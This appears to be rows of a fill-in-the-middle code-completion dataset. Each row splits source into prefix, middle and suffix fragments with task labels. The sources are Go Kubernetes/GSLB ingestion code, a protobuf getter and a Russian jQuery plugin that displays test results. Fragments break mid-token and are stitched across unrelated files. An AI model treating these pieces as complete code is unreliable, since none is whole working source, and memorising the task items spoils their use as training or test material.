}
func (m *AttributeContext_HttpRequest) GetScheme() string {
if m != nil {
return m.Scheme
}
return ""
}
func (m * | {
return xxx_messageInfo_AttributeContext_HttpRequest.Marshal(b, m, deterministic)
} | identifier_body |
1602.object_view.js | ?1:0)+'" '+(cl?'iclass="'+className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+val+'</td></tr>';
// Рекурсивно вычисляем развернутых потомков
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),(cl?className:void(0)));
}
}
if(r=='')r='<tr level="'+level+'"><td class="ovColMain" style="padding-left:'+(15*level)+'px">empty</td><td class="ovColumn">empty</td></tr>';
// Отметить вершину как "expanded"
if(level>0)exp.push(pathStr);
return r;
/* }}} */
},
saveValue: function(el){/* {{{ */
var tag = el.tagName.toLowerCase();
switch(tag){
case 'select':
case 'textarea':
case 'input':
// Прекращаем работу функции, если ничего не изменилось
if(tag !='select' && el.defaultValue==el.value)return;
// Выходим на объект и его значение
var ovid = el.parentNode.parentNode.parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
var obj = $.ov.views[ovid].object;
var path = el.attributes.path.nodeValue.split('.');
var last = path.pop();
for(var i in path)obj = obj[path[i]];
// Сохраняем значение в объекте
el.defaultValue = el.value;
obj[last] = el.value;
// Обновляем родителя (если есть)
var tr = el.parentNode.parentNode;
var curLevel = Number(tr.attributes.level.nodeValue);
var sibling = tr.previousSibling;
if(curLevel>0){
while(sibling && Number(sibling.attributes.level.nodeValue)==curLevel)
sibling=sibling.previousSibling;
}
if(sibling){ // Нашли строку таблицы, содержащую родителя
var cl = $.ov.classes[sibling.attributes.iclass.nodeValue];
sibling.childNodes[1].innerHTML = typeof cl.collection.value == 'function'?cl.collection.value(obj):obj;
}
break;
break;
}
/* }}} */
},
handleAction: function(ovid,path,index,field,className){
$.ov.classes[className].members[field].action.apply($.ov.views[ovid].object[path][index]);
},
classes:{}
};
/* {{{ */
$.ov.classes.userTesting = {
members:{
subject: 'Предмет',
script: 'Сценарий',
userName: 'Тестируемый',
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
attempts: {
label: 'Попытки',
asString: function(x){
var n = x.length;
if(n%10>4 || n%10==0 || (n>10 && n<20)) return n+' попыток';
if(n%10==1) return n+' попытка';
return n+' попытки';
},
className: 'testAttempt',
defaultExpanded: true
}
}
};
$.ov.classes.testAttempt= {
members:{
timeBegin: {
label:'Открыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
timeEnd: {
label:'Закрыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
themes: {
label: 'Заданные вопросы',
className: 'testTheme',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Попытка №'+(Number(i)+1);
},
value: function(){
return (Math.round(Number(this.result)*10)/10)+'%';
},
defaultExpanded: true,
expandable: true
}
};
$.ov.classes.testTheme = {
members:{
themeName: 'Название',
questCount: 'Кол-во вопросов',
correctAns: 'Отвечено верно',
result: {
calculated: true,
label: 'Результат по теме',
asString: function(){return Math.round((this.correctAns/this.questCount)*1000)/10+'%';}
},
questions: {
label: 'Вопросы темы',
className: 'testQuestion',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection:{
index: function(i,val){
return 'Тема №'+(Number(i)+1);
},
value: function(val){
return '<b>'+this.themeName+'</b> (отвечено верно <b style="color:blue">'+this.correctAns+'</b> из '+this.questCount+')';
},
defaultExpanded: false,
expandable: true
}
};
$.ov.classes.testQuestion = {
members:{
answers:{
label: 'Ответы',
className: 'testAnswer',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Вопрос '+(Number(i)+1);
},
value: function(val){
if(globals.godMode){
var correct = true;
for(var j in this.answers)if(this.answers[j].isCorrect!=this.answers[j].userAnswer)correct = false;
return '<span style="font-weight:700;color:'+(correct?'green':'red')+'">'+this.content+'</span>';
}else{
return this.content;
}
},
defaultExpanded: false,
expandable: true
}
};
$.ov.classes.testAnswer = {
members:{},
collection:{
index: function(i,val){
console.log(this);
return '<input type="'+(this.t==1?'radio':'checkbox')+'" disabled '+(this.userAnswer===1?'checked':'')+' />';
},
value: function(val){
return this.content+(globals.godMode && this.isCorrect===1?' <b style="color:green;">(правильный ответ)</b>':'');
},
defaultExpanded: false,
expandable: false
}
}
/* }}} */
/*
Function: objectView
*jQuery-plugin* отображения объекта
Parameters:
obj - Объект
className - *string* Имя класса
*/
$.fn.objectView = function(obj,className){/* {{{ */
var path;
if(typeof obj == 'string')
path = obj.split('.'); // полагаем что в ключе не может быть точки
else
path = [];
var level = path.length;
if(level==0){
var ovid = this.attr('ovid');
if(!ovid){
ovid = $.ov.views.length;
this.attr('ovid',ovid);
$.ov.views.push({
object:obj,
expanded:[]
});
}else{
$.ov.views[ovid].object = obj;
$.ov.views[ovid].expanded = [];
}
}else{
var tmp = this;
var tmp2;
ovid = this[0].parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
if(this.attr('expanded')==1){
var curlevel = this.attr('level');
tmp = tmp.next('tr');
while(true){
if(tmp.attr('level')<=curlevel || tmp.size()==0)break;
tmp2 = tmp.next('tr');
tmp.remove();
tmp = tmp2;
}
this.attr('expanded',0);
var pathStr = path.join('.');
var exp = $.ov.views[ovid].expanded;
for(var i in exp)if(exp[i]==pathStr)delete exp[i];
return this;
}
this.attr('expanded',1);
obj = $.ov.views[ovid];
}
var r = $.ov.objectToRows(ovid,path,className);
if(level == 0){
if(this.children('table.objectView').size()==0)
this.html('<table class="objectView" cellspacing="0"><thead><tr><th colspan="Object View"></th></tr></thead><tbody></tbody></table>');
var tbody = this.children('table.objectView tbody');
tbody.html(r);
}else{
this.after(r);
}
/* }}} */
}
$.fn.objectXView = function(obj,className){
if(!$.ov.classes[className])return false;
| var cs = $.ov.classes[className].collections;
| random_line_split |
|
1602.object_view.js | x == 'object' && typeof mem.editing != 'object')
)
){ // Edit
var type = (mem.editing&&mem.editing.type)?mem.editing.type:mem.editing;
switch(type){
case 'textarea':
value = '<textarea path="'+newPathStr+'" rows="'+(mem.editing&&mem.editing.rows?mem.editing.rows:3)+'" onblur="$.ov.saveValue(this);">'+String(x).replace(/</g,'<')+'</textarea>';
break;
case 'password':
case 'text':
default:
value = '<input type="'+(type=='password'?type:'text')+'" path="'+newPathStr+'" value="'+String(x).replace(/\"/g,'"').replace(/[\n\r]/,"")+'" onblur="$.ov.saveValue(this);" />';
break;
case 'select':
var opts = '';
for(var i in mem.editing.opts){
opts+='<option '+(x==mem.editing.opts[i]?'selected':'')+'>'+mem.editing.opts[i]+'</option>';
}
value = '<select path="'+newPathStr+'" onchange="$.ov.saveValue(this);">'+opts+'</select>';
break;
}
}else{ // Readonly
var c = $.ov.classes[mem.className];
if(typeof mem.asString == 'function'){
value = mem.asString.apply(obj,[x]);
}else if(c){
if(c.collection && typeof c.collection.value == 'function')
value = $.ov.cl | ',\''+mem.className+'\'':'')+')"';
var is_levelup = false;
if(typeof x == 'object')for(var xxx in x){is_levelup = true; break;}
var expanded = is_levelup && (cm_in_array(exp,newPathStr) || x.__ov_expanded || mem.defaultExpanded);
r+='<tr level="'+level+'" expanded="'+(expanded?1:0)+'" '+(mem.className?'iclass="'+mem.className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+value+'</td></tr>';
// Рекурсивно вычисляем развернутых потомков
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),mem.className);
}
}else{ // не удалось найти описание объекта, либо объект - коллекция
for(var i in obj){
try{
var x = obj[i];
}catch(e){
continue;
}
var defExp = false;
if(cl && isCollection){
var vis = cl.collection.visible;
if(typeof vis == 'function' && !vis(i,obj[i]))continue;
var label = typeof cl.collection.index == 'function'?cl.collection.index.apply(obj[i],[i,obj[i]]):i;
var val = typeof cl.collection.value == 'function'?cl.collection.value.apply(obj[i]):obj[i];
var is_levelup = (typeof cl.collection.expandable == 'undefined' && typeof x == 'object')?true:!!cl.collection.expandable;
defExp = !!cl.collection.defaultExpanded;
}else{
var label = i;
var val = this.objectMemberValue(x);
var is_levelup = false;
if(typeof x != 'string')for(var xxx in x){is_levelup = true; break;}
}
var newPathStr = pathStr+(level>0?'.':'')+i;
var levelup = ' onclick="$(this.parentNode).objectView(\''+newPathStr+'\''+(cl?',\''+className+'\'':'')+')"';
var expanded = is_levelup && (cm_in_array(exp,newPathStr) || x.__ov_expanded || defExp);
r+='<tr level="'+level+'" expanded="'+(expanded?1:0)+'" '+(cl?'iclass="'+className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+val+'</td></tr>';
// Рекурсивно вычисляем развернутых потомков
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),(cl?className:void(0)));
}
}
if(r=='')r='<tr level="'+level+'"><td class="ovColMain" style="padding-left:'+(15*level)+'px">empty</td><td class="ovColumn">empty</td></tr>';
// Отметить вершину как "expanded"
if(level>0)exp.push(pathStr);
return r;
/* }}} */
},
saveValue: function(el){/* {{{ */
var tag = el.tagName.toLowerCase();
switch(tag){
case 'select':
case 'textarea':
case 'input':
// Прекращаем работу функции, если ничего не изменилось
if(tag !='select' && el.defaultValue==el.value)return;
// Выходим на объект и его значение
var ovid = el.parentNode.parentNode.parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
var obj = $.ov.views[ovid].object;
var path = el.attributes.path.nodeValue.split('.');
var last = path.pop();
for(var i in path)obj = obj[path[i]];
// Сохраняем значение в объекте
el.defaultValue = el.value;
obj[last] = el.value;
// Обновляем родителя (если есть)
var tr = el.parentNode.parentNode;
var curLevel = Number(tr.attributes.level.nodeValue);
var sibling = tr.previousSibling;
if(curLevel>0){
while(sibling && Number(sibling.attributes.level.nodeValue)==curLevel)
sibling=sibling.previousSibling;
}
if(sibling){ // Нашли строку таблицы, содержащую родителя
var cl = $.ov.classes[sibling.attributes.iclass.nodeValue];
sibling.childNodes[1].innerHTML = typeof cl.collection.value == 'function'?cl.collection.value(obj):obj;
}
break;
break;
}
/* }}} */
},
handleAction: function(ovid,path,index,field,className){
$.ov.classes[className].members[field].action.apply($.ov.views[ovid].object[path][index]);
},
classes:{}
};
/* {{{ */
$.ov.classes.userTesting = {
members:{
subject: 'Предмет',
script: 'Сценарий',
userName: 'Тестируемый',
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
attempts: {
label: 'Попытки',
asString: function(x){
var n = x.length;
if(n%10>4 || n%10==0 || (n>10 && n<20)) return n+' попыток';
if(n%10==1) return n+' попытка';
return n+' попытки';
},
className: 'testAttempt',
defaultExpanded: true
}
}
};
$.ov.classes.testAttempt= {
members:{
timeBegin: {
label:'Открыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
timeEnd: {
label:'Закрыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
themes: {
label: 'Заданные вопросы',
className: 'testTheme',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Попытка №'+(Number(i)+1);
},
value: function(){
return (Math.round(Number(this.result)*10)/10)+'%';
},
defaultExpanded: true,
expandable: true
}
};
$.ov.classes.testTheme = {
members:{
themeName: 'Название',
questCount: 'Кол-во вопросов',
correctAns: 'Отвечено верно',
result: {
calculated: true,
label: 'Результат по теме',
asString: function(){return Math.round((this.correctAns/this.questCount)*1000)/10+'% | asses[mem.className].collection.value.apply(x);
}
}
if(typeof mem == 'string'){
label = mem;
}else if(typeof mem == 'object' && mem.label){
label = mem.label;
}
var levelup = 'class="likealink" onclick="$(this.parentNode).objectView(\''+newPathStr+'\''+(mem.className? | conditional_block |
dq_ingestion.go | Name, key string, sharedQueue *utils.WorkerQueue) {
// First see if there's another instance of the same model in the store
modelName := tenant + "/" + gsName
bkt := utils.Bkt(modelName, sharedQueue.NumWorkers)
sharedQueue.Workqueue[bkt].AddRateLimited(modelName)
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "published key to rest layer")
}
func GetObjTrafficRatio(ns, cname string) int32 {
globalFilter := gslbutils.GetGlobalFilter()
if globalFilter == nil {
// return default traffic ratio
gslbutils.Errf("ns: %s, cname: %s, msg: global filter can't be nil at this stage", ns, cname)
return 1
}
val, err := globalFilter.GetTrafficWeight(ns, cname)
if err != nil {
gslbutils.Warnf("ns: %s, cname: %s, msg: error occured while fetching traffic info for this cluster, %s",
ns, cname, err.Error())
return 1
}
return val
}
func getObjFromStore(objType, cname, ns, objName, key, storeType string) interface{} {
var store *gslbutils.ClusterStore
switch objType {
case gslbutils.RouteType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedRouteStore()
} else {
store = gslbutils.GetRejectedRouteStore()
}
if store == nil {
// Error state, the route store is not updated, so we can't do anything here
gslbutils.Errf("key: %s, msg: %s", key, "accepted route store is empty, can't add route")
return nil
}
break
case gslbutils.IngressType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedIngressStore()
} else {
store = gslbutils.GetRejectedIngressStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted ingress store is empty, can't add ingress")
return nil
}
break
case gslbutils.SvcType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) | gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "recieved delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
| {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname) | identifier_body |
dq_ingestion.go | store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "recieved delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
return
}
uniqueMembersLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
aviGS.(*AviGSObjectGraph).DeleteMember(cname, ns, objName, objType)
// delete the obj from the hostname map
newUniqueMemberLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if uniqueMembersLen != newUniqueMemberLen {
metaObj.DeleteMapByKey(clusterObj)
}
gslbutils.Debugf("key: %s, gsMembers: %d, msg: checking if its a GS deletion case", key,
aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs()) == 0 {
deleteGs = true
}
} else {
// avi graph not found, return
gslbutils.Warnf("key: %s, msg: no gs key found in gs models", key)
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
if deleteGs {
// add the object to the delete cache and remove from the model cache
SharedDeleteGSGraphLister().Save(modelName, aviGS)
SharedAviGSGraphLister().Delete(modelName)
} else {
SharedAviGSGraphLister().Save(modelName, aviGS)
}
if gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func isAcceptableObject(objType string) bool {
return objType == gslbutils.RouteType || objType == gslbutils.IngressType || objType == gslbutils.SvcType
}
func DequeueIngestion(key string) {
// The key format expected here is: operation/objectType/clusterName/Namespace/objName
gslbutils.Logf("key: %s, msg: %s", key, "starting graph sync")
objectOperation, objType, cname, ns, objName := gslbutils.ExtractMultiClusterKey(key)
sharedQueue := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
if !isAcceptableObject(objType) { | gslbutils.Warnf("key: %s, msg: %s", key, "not an acceptable object, can't process")
return | random_line_split |
|
dq_ingestion.go | utils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "recieved delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
return
}
uniqueMembersLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
aviGS.(*AviGSObjectGraph).DeleteMember(cname, ns, objName, objType)
// delete the obj from the hostname map
newUniqueMemberLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if uniqueMembersLen != newUniqueMemberLen {
metaObj.DeleteMapByKey(clusterObj)
}
gslbutils.Debugf("key: %s, gsMembers: %d, msg: checking if its a GS deletion case", key,
aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
